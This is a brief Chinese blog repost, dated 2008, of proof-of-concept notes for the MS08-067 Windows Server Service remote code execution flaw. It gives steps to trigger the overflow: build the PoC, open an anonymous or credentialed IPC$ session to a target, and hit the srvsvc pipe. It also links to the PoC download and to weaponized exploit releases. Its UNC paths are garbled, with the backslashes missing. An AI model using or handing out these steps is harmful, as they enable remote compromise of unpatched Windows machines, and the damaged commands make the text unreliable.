MS08-067 - MS Windows Server Service Code Execution PoC

2008-10-25

漏洞信息

PoC

Windows

1分钟

133字

MS08-067 - MS Windows Server Service Code Execution PoC

In vstudio command prompt:

mk.bat

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/…)

net use \IPADDRESSIPC$ /user

creds die \IPADDRESS pipesrvsvc

In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page violation), access violation, etc. However, in some cases, you will get nothing.

This is because it depends on the state of the stack prior to the “overflow”. You need a slash on the stack prior to the input buffer.

So play around a bit, you’ll get it working reliably…

poc: http://milw0rm.com/sploits/2008-ms08-067.zip

milw0rm.com [2008-10-23]

update:

第一个MS08-067 exploit 利用代码公布： MS08-067 Exploit for CN 2k/xp/2003 bypass version

cnqing的.net带界面版本： MS08-067 Exploit for CN 2k/xp/2003 .net version

Windows Sysinternals Suite Build 2008.09.30

Ubuntu 8.10 RC

本文标题：MS08-067 - MS Windows Server Service Code Execution PoC

文章作者：夜火

发布时间：2008-10-25

原始链接：https://www.15897.com/blog/ms08-067

个人的碎碎念收集箱

文章目录